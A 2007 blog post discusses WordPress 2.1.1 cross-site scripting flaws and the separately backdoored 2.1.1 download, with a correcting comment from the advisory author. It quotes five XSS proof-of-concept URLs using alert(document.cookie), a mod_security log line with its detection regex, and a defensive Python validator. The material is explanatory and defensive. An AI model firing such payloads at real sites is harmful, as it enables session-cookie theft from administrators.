"Wordpress is dangerous, upgrade now!" seems to be the headline traveling the blogosphere in reference to the Wordpress 2.1.1 release. According to numerous websites, a number of vulnerabilities are included in the 2.1.1 release, and Wordpress.org is notifying its users of a dangerous release and asking everyone to download the new 2.1.2.
What I find interesting is how Wordpress.org is informing everyone that someone, a cracker, gained access to their file system and modified the original source of the WP 2.1.1 download. Not all users were affected? According to the Wordpress XSS/CSRF advisory posted on February 27, 2007, the vulnerabilities existed within the post parameter of Wordpress.
Okay, so Stefan Friedli discovered some new vulnerabilities in Wordpress 2.1.1, tested them and wrote about them on February 27, 2007. The vulnerabilities were simply cross-site request forgery (CSRF) calls to the post parameter of Wordpress.
According to the advisory:
This list may not be exhaustive. It illustrated that the flaw with confirmation dialogs in Wordpress is not limited to the "Delete Post" function. Fixing the validation of the post parameter as suggested by e.g. Secunia does not fix the problem and does not reduce the threat of cross-site scripting or any other web-based exploitation.
I tested the attack vectors and a few variants of each on my test server and a production server both running wordpress 2.1.1 and mod_security.
Possible injection…
… when deleting posts as mentioned in Samenspenders advisory (unvalidated parameter: post, file: post.php)
>http://target.tld/wp-admin/post.php?action=delete&post='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
… when deleting comments (unvalidated parameter: c, file: comment.php)
>http://target.tld/wp-admin/comment.php?action=deletecomment&p=39&c='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
… when deleting pages (unvalidated parameter: page, file: page.php)
>http://target.tld/wp-admin/page.php?action=delete&post='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
… when deleting categories (unvalidated parameter: cat_ID, file: categories.php)
>http://target.tld/wp-admin/categories.php?action=delete&cat_ID='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
… when deleting comments (unvalidated parameter: c, file: comment.php)
>http://target.tld/wp-admin/comment.php?action=deletecomment&p=35&c='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
mod_security definitely did its part by disallowing the attempt to successfully execute; the error_log showed:
[error] [client XXX.XXX.XXX.XXX] mod_security: Access denied with code 500. Pattern match "<[[:space:]]*(script|about|applet|activex|chrome)*>.*(script|about|applet|activex|chrome)[[:space:]]*>" at REQUEST_URI [hostname "target.tld"] [uri "/wp-admin/comment.php?action=deletecomment&p=35&c='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E"] [unique_id "eN3hmkZVwpIAAAgSjcIAAAAH"]
mod_security blocked each attack vector as well. Therefore, I believe it is safe to say, if you're operating on version 2.1.1 and have not upgraded to 2.1.2, you might be safe. At least I'm not sweating the vulnerability. It's definitely difficult at times to keep up with Wordpress 0day XSS and CSRF vulnerabilities. Hopefully the kiddies haven't gotten a hold of any major blogs because of this attack.
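As an added example (my code, not the post's or the advisory's), here is the fix the advisory argues for, validating every ID parameter it names as a positive integer, next to the mod_security pattern from the error_log above, both run over the advisory's five request URIs; the ID_PARAMS set and the case-insensitive matching are my assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# The five request URIs listed in the advisory (copied from the post).
ADVISORY_URLS = [
    "http://target.tld/wp-admin/post.php?action=delete&post='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E",
    "http://target.tld/wp-admin/comment.php?action=deletecomment&p=39&c='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E",
    "http://target.tld/wp-admin/page.php?action=delete&post='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E",
    "http://target.tld/wp-admin/categories.php?action=delete&cat_ID='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E",
    "http://target.tld/wp-admin/comment.php?action=deletecomment&p=35&c='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E",
]

# Query parameters wp-admin treats as object IDs (names taken from the advisory;
# the set itself is my assumption). A real fix validates every one of them,
# not just "post", as the advisory points out.
ID_PARAMS = {"post", "page", "p", "c", "cat_ID"}

# The pattern mod_security reported in the error_log, in Python regex syntax
# ([[:space:]] -> \s). Case-insensitive matching is my assumption about the rule.
SCRIPT_TAG = re.compile(
    r"<\s*(?:script|about|applet|activex|chrome)*>.*"
    r"(?:script|about|applet|activex|chrome)\s*>",
    re.I | re.S,
)


def check_ids(url: str) -> dict:
    """Return {param: accepted} for each ID parameter present in the URL.
    A value is accepted only if it is a plain positive decimal integer."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {
        name: values[0].isdigit() and int(values[0]) > 0
        for name, values in query.items()
        if name in ID_PARAMS
    }


def waf_would_block(url: str) -> bool:
    """Apply the error_log pattern to the URL-decoded request URI, which is
    what mod_security matched at REQUEST_URI."""
    return SCRIPT_TAG.search(unquote(url)) is not None


def triage(urls):
    """For each URL: (ID parameters the validator rejects, WAF pattern hit?)."""
    return [
        (sorted(n for n, ok in check_ids(u).items() if not ok), waf_would_block(u))
        for u in urls
    ]
```

Every advisory URI fails the integer check, which closes the hole regardless of whether a WAF signature happens to match; a benign `post=12` passes both.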
Just a little more info…
This entry was posted on Friday, March 2nd, 2007 at 10:22 pm and is filed under wordpress, php, security, hacks, XSS and CSRF. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.
1 Comment
Stefan Friedli
March 5th, 2007 at 3:03 am
Hi Justin
You're mixing up two things here: the first issue is a lack of input validation for various parameters in the regular release of Wordpress that I described in my advisory, which you linked in your article.
The second thing you're mentioning is the maliciously manipulated version of 2.1.1 that was available from Wordpress's official download site for a while due to a badly secured server. Several files of this distribution were backdoored by the intruder, so mod_security most possibly won't save your a** there ;).
Cheers
Stefan